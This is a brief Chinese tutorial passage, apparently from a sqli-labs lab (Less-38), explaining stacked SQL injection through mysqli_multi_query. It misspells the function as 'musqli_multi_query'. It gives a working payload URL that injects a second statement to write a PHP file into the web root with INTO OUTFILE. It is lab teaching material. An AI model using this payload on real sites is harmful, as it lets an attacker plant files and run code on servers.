5、堆叠(多语句)注入
http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;--
在php连接mysql注入中用到了musqli_multi_query这个函数,这个函数类似于 mysqli_query这个函数,只不过区别就是musqli_multi_query这个函数可以堆叠注入, 比如说select 1,2,3;select 2,3,4; 我们在注入时可以通过;来破坏SQL语句,以达到我们 想要的目的